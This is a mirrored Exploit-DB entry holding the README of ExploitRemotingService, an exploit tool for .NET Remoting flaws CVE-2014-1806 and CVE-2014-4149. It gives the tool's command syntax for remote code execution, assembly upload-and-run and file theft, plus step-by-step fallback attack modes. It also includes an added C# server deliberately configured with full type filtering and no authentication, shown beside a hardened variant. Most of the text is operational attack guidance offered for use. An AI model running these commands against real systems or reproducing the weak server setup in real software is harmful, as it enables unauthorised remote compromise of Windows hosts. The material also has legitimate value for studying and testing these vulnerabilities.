exploit-db-mirror/exploits/windows/remote/35280.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25
2018-09-25 05:01:51 +00:00

Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35280.zip
ExploitRemotingService (c) 2014 James Forshaw
=============================================
A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.
It only works on Windows although some aspects _might_ work in Mono on *nix.
Usage Instructions:
===================
ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
  The supported URIs are as follows:
    tcp://host:port/ObjName - TCP connection on host and port
    ipc://channel/ObjName   - Named pipe channel

Options:
  -s, --secure          Enable secure mode
  -p, --port=VALUE      Specify the local TCP port to listen on
  -i, --ipc=VALUE       Specify listening pipe name for IPC channel
      --user=VALUE      Specify username for secure mode
      --pass=VALUE      Specify password for secure mode
      --ver=VALUE       Specify version number for remote, 2 or 4
      --usecom          Use DCOM backchannel instead of .NET remoting
      --remname=VALUE   Specify the remote object name to register
  -v, --verbose         Enable verbose debug output
      --useser          Use old serialization tricks, only works on
                        full type filter services
  -h, -?, --help

Commands:
  exec [-wait] program [cmdline] : Execute a process on the hosting server
  cmd cmdline                    : Execute a command line process and display stdout
  put localfile remotefile       : Upload a file to the hosting server
  get remotefile localfile       : Download a file from the hosting server
  ls remotedir                   : List a remote directory
  run file [args]                : Upload and execute an assembly, calls entry point
  user                           : Print the current username
  ver                            : Print the OS version
This tool supports exploiting both TCP remoting services and local IPC services. To test
the exploit you need to know the name of the .NET remoting service and the port it's
listening on (for TCP) or the name of the named pipe (for IPC). You can normally find
this in the server or client code. Look for calls to:
RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance
You can then try the exploit by constructing an appropriate URL. For TCP use the
URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.
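The registration code the paragraph above tells you to look for, as an added example written for this page (it is not the tool's bundled example service and not Forshaw's code). The port 8080, the pipe name ReviewPipe, the object name ObjName and the RemoteObject type are all assumptions. The weak and hardened variants sit side by side so that the values which end up in the URI, and the TypeFilterLevel setting the --useser path depends on, stand out when you read a real server.

```csharp
// Added example, not part of ExploitRemotingService. Port, pipe name, object
// name and the RemoteObject type are hypothetical values chosen for this page.
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Serialization.Formatters;

// The remoted object. MarshalByRefObject is what makes it reachable over the
// channel; its methods do not matter to the attack, the channel setup does.
public class RemoteObject : MarshalByRefObject
{
    public string Hello(string name) { return "Hello, " + name; }
}

public static class ServerConfig
{
    // The URI the tool expects, built from what the registration reveals:
    // tcp://host:port/ObjName for a TcpChannel, ipc://portName/ObjName for IpcChannel.
    public static string TcpUri(string host, int port, string objName)
    {
        return "tcp://" + host + ":" + port + "/" + objName;
    }

    public static string IpcUri(string pipeName, string objName)
    {
        return "ipc://" + pipeName + "/" + objName;
    }

    // Weak configuration. TypeFilterLevel.Full lets the BinaryFormatter
    // deserialize whatever types the client sends, which is what the tool's
    // --useser path needs. No "secure" property, so no authentication either.
    public static void RegisterWeakTcp(int port, string objName)
    {
        var provider = new BinaryServerFormatterSinkProvider();
        provider.TypeFilterLevel = TypeFilterLevel.Full;   // look for this
        IDictionary props = new Hashtable();
        props["port"] = port;                              // -> tcp://host:8080/...
        var channel = new TcpChannel(props, null, provider);
        ChannelServices.RegisterChannel(channel, false);   // ensureSecurity = false
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(RemoteObject), objName, WellKnownObjectMode.Singleton); // -> /ObjName
    }

    // IPC variant: the "portName" property is the named pipe that goes in the URI.
    public static void RegisterWeakIpc(string pipeName, string objName)
    {
        var provider = new BinaryServerFormatterSinkProvider();
        provider.TypeFilterLevel = TypeFilterLevel.Full;
        IDictionary props = new Hashtable();
        props["portName"] = pipeName;                      // -> ipc://ReviewPipe/...
        var channel = new IpcChannel(props, null, provider);
        ChannelServices.RegisterChannel(channel, false);
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(RemoteObject), objName, WellKnownObjectMode.Singleton);
    }

    // Tighter configuration. TypeFilterLevel.Low closes the --useser path (the
    // README says that path needs full type filtering). "secure" turns on the
    // channel's authentication, which the tool's --secure/--user/--pass options
    // show is a hurdle rather than a fix. The default path is closed only by the
    // framework update for CVE-2014-1806, not by anything in this code.
    public static void RegisterHardenedTcp(int port, string objName)
    {
        var provider = new BinaryServerFormatterSinkProvider();
        provider.TypeFilterLevel = TypeFilterLevel.Low;
        IDictionary props = new Hashtable();
        props["port"] = port;
        props["secure"] = true;
        var channel = new TcpChannel(props, null, provider);
        ChannelServices.RegisterChannel(channel, true);    // ensureSecurity = true
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(RemoteObject), objName, WellKnownObjectMode.Singleton);
    }
}

class Program
{
    static void Main()
    {
        // Host the weak TCP service so the tool has something to talk to.
        ServerConfig.RegisterWeakTcp(8080, "ObjName");
        Console.WriteLine("Try: ExploitRemotingService "
            + ServerConfig.TcpUri("localhost", 8080, "ObjName") + " ver");
        Console.WriteLine("Press Enter to exit.");
        Console.ReadLine();
    }
}
```

Compile it against the remoting assembly (csc /r:System.Runtime.Remoting.dll) on the .NET Framework; .NET Remoting is not available on .NET Core. When auditing a real server, the three things to pull out are the "port" or "portName" value, the object name passed to RegisterWellKnownServiceType, and the provider's TypeFilterLevel, since those decide the URI and which of the tool's modes has a chance.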
A simple test is to do:
ExploitRemotingService SERVICEURL ver
If successful it should print the OS version of the hosting .NET remoting service. If
you get an exception instead, the server might be patched against CVE-2014-1806. At
this point try the COM version using:
ExploitRemotingService --usecom SERVICEURL ver
This works best locally, but it can work remotely: if you modify the COM configuration
and disable the firewall you should be able to get it to work. If that still doesn't
work then it might be an up to date server. Instead you can also try the full
serialization version using:
ExploitRemotingService --useser SERVICEURL ls c:\
For this to work the remoting service must be running with full type filter mode
enabled (which some are, especially IPC services). It also only works with the commands
ls, put and get, but that should be enough to compromise a box.
I've provided an example service to test against.